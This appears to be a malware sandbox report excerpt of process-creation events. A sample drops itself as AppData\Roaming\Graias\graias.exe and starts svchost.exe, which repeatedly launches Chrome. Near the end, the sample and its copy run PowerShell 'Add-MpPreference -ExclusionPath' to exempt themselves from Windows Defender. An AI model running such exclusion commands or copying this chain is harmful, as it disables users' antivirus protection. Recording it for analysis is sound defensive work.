                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
